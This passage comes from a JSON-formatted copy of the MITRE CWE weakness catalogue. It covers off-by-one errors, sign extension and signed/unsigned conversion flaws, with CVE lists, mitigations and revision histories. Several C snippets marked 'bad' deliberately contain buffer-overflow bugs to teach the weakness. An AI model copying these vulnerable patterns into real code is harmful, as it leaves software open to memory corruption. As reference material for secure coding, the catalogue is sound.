{}","xhtml:div":{"#text":"char name[20];sprintf(name, \\"%16s.dat\\", filename);int success = saveFormattedFilenameToDB(name);return success;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":"However this will cause an Off-by-one error if the original filename is exactly 16 characters or larger because the format of 16 characters with the file extension is exactly 20 characters and does not take into account the required null terminator that will be placed at the end of the string."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0252","Description":"Off-by-one error allows remote attackers to cause a denial of service and possibly execute arbitrary code via requests that do not contain newlines.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0252"},{"Reference":"CVE-2001-1391","Description":"Off-by-one vulnerability in driver allows users to modify kernel memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1391"},{"Reference":"CVE-2002-0083","Description":"Off-by-one error allows local users or remote malicious servers to gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0083"},{"Reference":"CVE-2002-0653","Description":"Off-by-one buffer overflow in function usd by server allows local users to execute arbitrary code as the server user via .htaccess files with long entries.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0653"},{"Reference":"CVE-2002-0844","Description":"Off-by-one buffer overflow in version control system allows local users to execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0844"},{"Reference":"CVE-1999-1568","Description":"Off-by-one error in FTP server allows a remote attacker to cause a denial of service (crash) via a long PORT command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1568"},{"Reference":"CVE-2004-0346","Description":"Off-by-one buffer overflow in FTP server allows local users to gain privileges via a 1024 byte RETR command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0346"},{"Reference":"CVE-2004-0005","Description":"Multiple buffer overflows in chat client allow remote attackers to cause a denial of service and possibly execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0005"},{"Reference":"CVE-2003-0356","Description":"Multiple off-by-one vulnerabilities in product allow remote attackers to cause a denial of service and possibly execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0356"},{"Reference":"CVE-2001-1496","Description":"Off-by-one buffer overflow in server allows remote attackers to cause a denial of service and possibly execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1496"},{"Reference":"CVE-2004-0342","Description":"This is an interesting example that might not be an off-by-one.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0342"},{"Reference":"CVE-2001-0609","Description":"An off-by-one enables a terminating null to be overwritten, which causes 2 strings to be merged and enable a format string.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0609"},{"Reference":"CVE-2002-1745","Description":"Off-by-one error allows source code disclosure of files with 4 letter extensions that match an accepted 3-letter extension.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1745"},{"Reference":"CVE-2002-1816","Description":"Off-by-one buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1816"},{"Reference":"CVE-2002-1721","Description":"Off-by-one error causes an snprintf call to overwrite a critical internal variable with a null value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1721"},{"Reference":"CVE-2003-0466","Description":"Off-by-one error in function used in many products leads to a buffer overflow during pathname management, as demonstrated using multiple commands in an FTP server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0466"},{"Reference":"CVE-2003-0625","Description":"Off-by-one error allows read of sensitive memory via a malformed request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0625"},{"Reference":"CVE-2006-4574","Description":"Chain: security monitoring product has an off-by-one error that leads to unexpected length values, triggering an assertion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4574"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Off-by-one Error"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-155"}},{"attr":{"@_External_Reference_ID":"REF-156"}},{"attr":{"@_External_Reference_ID":"REF-157"}},{"attr":{"@_External_Reference_ID":"REF-140","@_Section":"Chapter 7, &#34;Buffer Overflow&#34;"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 5, &#34;Off-by-One Errors&#34;, Page 180"}}]},"Notes":{"Note":[{"#text":"This is not always a buffer overflow. For example, an off-by-one error could be a factor in a partial comparison, a read from the wrong memory location, an incorrect conditional, etc.","attr":{"@_Type":"Relationship"}},{"#text":"Under-studied. It requires careful code analysis or black box testing, where inputs of excessive length might not cause an error. Off-by-ones are likely triggered by extensive fuzzing, with the attendant diagnostic problems.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Common_Consequences, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"194":{"attr":{"@_ID":"194","@_Name":"Unexpected Sign Extension","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs an operation on a number that causes it to be sign extended when it is transformed into a larger data type. When the original number is negative, this can produce unexpected values that lead to resultant weaknesses.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability","Other"],"Impact":["Read Memory","Modify Memory","Other"],"Note":"When an unexpected sign extension occurs in code that operates directly on memory buffers, such as a size value or a memory index, then it could cause the program to write or read outside the boundaries of the intended buffer. If the numeric value is associated with an application-level resource, such as a quantity or price for a product in an e-commerce site, then the sign extension could produce a value that is much higher (or lower) than the application\'s allowable range."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Avoid using signed variables if you don\'t need to represent negative values. When negative values are needed, perform validation after you save those values to larger data types, or before passing them to functions that are expecting unsigned values."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-23"},"Intro_Text":"The following code reads a maximum size and performs a sanity check on that size. It then performs a strncpy, assuming it will not exceed the boundaries of the array. While the use of \\"short s\\" is forced in this particular example, short int\'s are frequently used within real-world code, such as code that processes structured data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int GetUntrustedInt () {}void main (int argc, char **argv) {}","xhtml:div":[{"#text":"return(0x0000FFFF);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char path[256];char *input;int i;short s;unsigned int sz;i = GetUntrustedInt();s = i;/* s is -1 so it passes the safety check - CWE-697 */if (s &gt; 256) {}/* s is sign-extended and saved in sz */sz = s;/* output: i=65535, s=-1, sz=4294967295 - your mileage may vary */printf(\\"i=%d, s=%d, sz=%u\\\\n\\", i, s, sz);input = GetUserInput(\\"Enter pathname:\\");/* strncpy interprets s as unsigned int, so it\'s treated as MAX_INT(CWE-195), enabling buffer overflow (CWE-119) */strncpy(path, input, s);path[255] = \'\\\\0\'; /* don\'t want CWE-170 */printf(\\"Path is: %s\\\\n\\", path);","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","",""],"xhtml:div":{"#text":"DiePainfully(\\"go away!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}}}],"xhtml:br":["",""]}},"Body_Text":"This code first exhibits an example of CWE-839, allowing \\"s\\" to be a negative number. When the negative short \\"s\\" is converted to an unsigned integer, it becomes an extremely large positive integer. When this converted integer is used by strncpy() it will lead to a buffer overflow (CWE-119)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2018-10887","Description":"Chain: unexpected sign extension (CWE-194) leads to integer overflow (CWE-190), causing an out-of-bounds read (CWE-125)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10887"},{"Reference":"CVE-1999-0234","Description":"Sign extension error produces -1 value that is treated as a command separator, enabling OS command injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0234"},{"Reference":"CVE-2003-0161","Description":"Product uses \\"char\\" type for input character. When char is implemented as a signed type, ASCII value 0xFF (255), a sign extension produces a -1 value that is treated as a program-specific separator value, effectively disabling a length check and leading to a buffer overflow. This is also a multiple interpretation error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0161"},{"Reference":"CVE-2007-4988","Description":"chain: signed short width value in image processor is sign extended during conversion to unsigned int, which leads to integer overflow and heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4988"},{"Reference":"CVE-2006-1834","Description":"chain: signedness error allows bypass of a length check; later sign extension makes exploitation easier.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1834"},{"Reference":"CVE-2005-2753","Description":"Sign extension when manipulating Pascal-style strings leads to integer overflow and improper memory copy.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2753"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Sign extension error"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT31-C","Entry_Name":"Ensure that integer conversions do not result in lost or misinterpreted data","Mapping_Fit":"CWE More Specific"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-161"}},{"attr":{"@_External_Reference_ID":"REF-162"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":[{"#text":"Sign extension errors can lead to buffer overflows and other memory-based problems. They are also likely to be factors in other weaknesses that are not based on memory operations, but rely on numeric calculation.","attr":{"@_Type":"Relationship"}},{"#text":"This entry is closely associated with signed-to-unsigned conversion errors (CWE-195) and other numeric errors. These relationships need to be more closely examined within CWE.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-05","Modification_Comment":"complete rewrite of the entire entry"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations, References"}],"Previous_Entry_Name":[{"#text":"Sign Extension Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Incorrect Sign Extension","attr":{"@_Date":"2008-11-24"}}]}},"195":{"attr":{"@_ID":"195","@_Name":"Signed to Unsigned Conversion Error","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses a signed primitive and performs a cast to an unsigned primitive, which can produce an unexpected value if the value of the signed primitive can not be represented using an unsigned primitive.","Extended_Description":{"xhtml:p":["It is dangerous to rely on implicit casts between signed and unsigned numbers because the result can take on an unexpected value and violate assumptions made by the program.","Often, functions will return negative values to indicate a failure. When the result of a function is to be used as a size parameter, using these negative return values can have unexpected results. For example, if negative size values are passed to the standard memory copy or allocation functions they will be implicitly cast to a large unsigned value. This may lead to an exploitable buffer overflow or underflow condition."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State","Note":"Conversion between signed and unsigned values can lead to a variety of errors, but from a security standpoint is most commonly associated with integer overflow and buffer overflow vulnerabilities."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-73"},"Intro_Text":"In this example the variable amount can hold a negative value when it is returned. Because the function is declared to return an unsigned int, amount will be implicitly converted to unsigned.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned int readdata () {}","xhtml:div":{"#text":"int amount = 0;...if (result == ERROR)amount = -1;...return amount;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}},"Body_Text":"If the error condition in the code above is met, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers."},{"attr":{"@_Demonstrative_Example_ID":"DX-74"},"Intro_Text":"In this example, depending on the return value of accecssmainframe(), the variable amount can hold a negative value when it is returned. Because the function is declared to return an unsigned value, amount will be implicitly cast to an unsigned number.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned int readdata () {}","xhtml:div":{"#text":"int amount = 0;...amount = accessmainframe();...return amount;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}}},"Body_Text":"If the return value of accessmainframe() is -1, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers."},{"attr":{"@_Demonstrative_Example_ID":"DX-21"},"Intro_Text":"The following code is intended to read an incoming packet from a socket and extract one or more headers.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"DataPacket *packet;int numHeaders;PacketHeader *headers;sock=AcceptSocketConnection();ReadPacket(packet, sock);numHeaders =packet-&gt;headers;if (numHeaders &gt; 100) {}headers = malloc(numHeaders * sizeof(PacketHeader);ParsePacketHeaders(packet, headers);","xhtml:br":["","","","","","","","","",""],"xhtml:div":{"#text":"ExitError(\\"too many headers!\\");","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The code performs a check to make sure that the packet does not contain too many headers. However, numHeaders is defined as a signed int, so it could be negative. If the incoming packet specifies a value such as -3, then the malloc calculation will generate a negative number (say, -300 if each header can be a maximum of 100 bytes). When this result is provided to malloc(), it is first converted to a size_t type. This conversion then produces a large value such as 4294966996, which may cause malloc() to fail or to allocate an extremely large amount of memory (CWE-195). With the appropriate negative numbers, an attacker could trick malloc() into using a very small positive number, which then allocates a buffer that is much smaller than expected, potentially leading to a buffer overflow."},{"Intro_Text":"This example processes user input comprised of a series of variable-length structures. The first 2 bytes of input dictate the size of the structure to be processed.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* processNext(char* strm) {}","xhtml:div":{"#text":"char buf[512];short len = *(short*) strm;strm += sizeof(len);if (len &lt;= 512) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"memcpy(buf, strm, len);process(buf);return strm + len;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"return -1;","attr":{"@_style":"margin-left:10px;"}}]}}},"Body_Text":"The programmer has set an upper bound on the structure size: if it is larger than 512, the input will not be processed. The problem is that len is a signed short, so the check against the maximum structure length is done with signed values, but len is converted to an unsigned integer for the call to memcpy() and the negative bit will be extended to result in a huge value for the unsigned integer. If len is negative, then it will appear that the structure has an appropriate size (the if branch will be taken), but the amount of memory copied by memcpy() will be quite large, and the attacker will be able to overflow the stack with data in strm."},{"attr":{"@_Demonstrative_Example_ID":"DX-114"},"Intro_Text":"In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int returnChunkSize(void *) {}int main() {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["","","","","",""],"xhtml:i":["/* if chunk info is valid, return the size of usable memory,","* else, return -1 to indicate an error","*/"]}},{"#text":"...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}},"Body_Text":"If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788)."},{"attr":{"@_Demonstrative_Example_ID":"DX-138"},"Intro_Text":"This example shows a typical attempt to parse a string with an error resulting from a difference in assumptions between the caller to a function and the function\'s action.","Example_Code":{"#text":"int proc_msg(char *s, int msg_len){}char *s = \\"preamble: message\\\\n\\";char *sl = strchr(s, \':\');        // Number of characters up to \':\' (not including space)int jnklen = sl == NULL ? 0 : sl - s;    // If undefined pointer, use zero lengthint ret_val = proc_msg (\\"s\\",  jnklen);    // Violate assumption of preamble length, end up with negative value, blow out stack","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"int pre_len = sizeof(\\"preamble: \\");char buf[pre_len - msg_len];","xhtml:i":["// Note space at the end of the string - assume all strings have preamble with space","... Do processing here if we get this far"],"xhtml:br":["","",""]}},"Body_Text":"The buffer length ends up being -1, resulting in a blown out stack. The space character after the colon is included in the function calculation, but not in the caller\'s calculation. This, unfortunately, is not usually so obvious but exists in an obtuse series of calculations."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2007-4268","Description":"Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4268"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Signed to unsigned conversion error"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT31-C","Entry_Name":"Ensure that integer conversions do not result in lost or misinterpreted data","Mapping_Fit":"CWE More Specific"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Type Conversions&#34;, Page 223"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Description, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, References"}]}},"196":{"attr":{"@_ID":"196","@_Name":"Unsigned to Signed Conversion Error","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses an unsigned primitive and performs a cast to a signed primitive, which can produce an unexpected value if the value of the unsigned primitive can not be represented using a signed primitive.","Extended_Description":"Although less frequent an issue than signed-to-unsigned conversion, unsigned-to-signed conversion can be the perfect precursor to dangerous buffer underwrite conditions that allow attackers to move down the stack where they otherwise might not have access in a normal buffer overflow condition. Buffer underwrites occur frequently when large unsigned values are cast to signed values, and then used as indexes into a buffer or for pointer arithmetic.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"124","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"120","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"Incorrect sign conversions generally lead to undefined behavior, and therefore crashes."},{"Scope":"Integrity","Impact":"Modify Memory","Note":"If a poor cast lead to a buffer overflow or similar condition, data integrity may be affected."},{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism"],"Note":"Improper signed-to-unsigned conversions without proper checking can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program\'s implicit security policy."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Choose a language which is not subject to these casting flaws."},{"Phase":"Architecture and Design","Description":"Design object accessor functions to implicitly check values for valid sizes. Ensure that all functions which will be used as a size are checked previous to use as a size. If the language permits, throw exceptions rather than using in-band errors."},{"Phase":"Implementation","Description":"Error check the return values of all functions. Be aware of implicit casts made, and use unsigned variables for sizes if at all possible."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Unsigned to signed conversion error"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"92"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Type Conversions&#34;, Page 